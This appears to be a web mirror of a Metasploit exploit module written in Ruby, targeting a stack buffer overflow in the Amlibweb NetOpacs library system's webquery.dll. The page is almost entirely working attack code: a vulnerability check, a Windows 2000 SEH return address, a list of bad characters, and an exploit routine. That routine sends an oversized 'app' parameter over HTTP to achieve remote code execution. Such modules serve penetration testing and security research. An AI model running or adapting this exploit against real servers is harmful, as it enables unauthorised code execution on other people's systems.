Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/http/amlibweb_webquerydll_app.rb
19664 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Exploit::Remote
7
Rank = NormalRanking
8
9
include Msf::Exploit::Remote::Tcp
10
include Msf::Exploit::Remote::Seh
11
12
def initialize(info = {})
13
super(
14
update_info(
15
info,
16
'Name' => 'Amlibweb NetOpacs webquery.dll Stack Buffer Overflow',
17
'Description' => %q{
18
This module exploits a stack buffer overflow in Amlib's Amlibweb
19
Library Management System (NetOpacs). The webquery.dll
20
API is available through IIS requests. By specifying
21
an overly long string to the 'app' parameter, SeH can be
22
reliably overwritten allowing for arbitrary remote code execution.
23
In addition, it is possible to overwrite EIP by specifying
24
an arbitrary parameter name with an '=' terminator.
25
},
26
'Author' => [ 'aushack' ],
27
'Arch' => [ ARCH_X86 ],
28
'License' => MSF_LICENSE,
29
'References' => [
30
[ 'OSVDB', '66814' ],
31
[ 'BID', '42293' ],
32
[ 'URL', 'http://www.aushack.com/advisories/' ],
33
],
34
'Privileged' => true,
35
'DefaultOptions' => {
36
'EXITFUNC' => 'thread',
37
'AllowWin32SEH' => true
38
},
39
'Payload' => {
40
# 'Space' => 600,
41
'BadChars' => "\x00\x0a\x0d\x20%=?\x2f\x5c\x3a\x3d\@;!$",
42
'EncoderType' => Msf::Encoder::Type::AlphanumMixed,
43
'DisableNops' => true,
44
'StackAdjustment' => -3500,
45
},
46
'Platform' => ['win'],
47
'Targets' => [
48
# aushack - Tested OK 20100803 w2k IIS5
49
[ 'Windows 2000 Pro All - English', { 'Ret' => 0x75022ac4 } ], # p/p/r ws2help.dll - 'dll?app={buff}' for SeH IIS5
50
# [ 'Windows 2003 Server All - English', { 'Ret' => 0x44434241 } ], # todo: 'dll?{buff}=' call edi for EIP in IIS6 w3wp.exe, 120 byte limit, ASCII only.
51
],
52
'DisclosureDate' => '2010-08-03', # 0day
53
'DefaultTarget' => 0,
54
'Notes' => {
55
'Reliability' => UNKNOWN_RELIABILITY,
56
'Stability' => UNKNOWN_STABILITY,
57
'SideEffects' => UNKNOWN_SIDE_EFFECTS
58
}
59
)
60
)
61
62
register_options(
63
[
64
Opt::RPORT(80),
65
]
66
)
67
end
68
69
def check
70
connect
71
72
rand = Rex::Text.rand_text_alpha(10)
73
74
sock.put("GET /amlibweb/webquery.dll?#{rand}= HTTP/1.0\r\n\r\n")
75
res = sock.get_once
76
disconnect
77
78
if (res.to_s =~ /<H1>BAD REQUEST<\/H1><P>Your client sent a request that this server didn't understand.<br>Request:\s(\w+)/)
79
if ($1 == rand)
80
return Exploit::CheckCode::Vulnerable
81
end
82
end
83
Exploit::CheckCode::Safe
84
end
85
86
def exploit
87
connect
88
seh = generate_seh_payload(target.ret)
89
90
buffer = Rex::Text.rand_text_alphanumeric(3028) + seh
91
sploit = "GET /amlibweb/webquery.dll?app=" + buffer + " HTTP/1.0\r\n"
92
sock.put(sploit + "\r\n\r\n")
93
94
handler
95
disconnect
96
end
97
end
98
99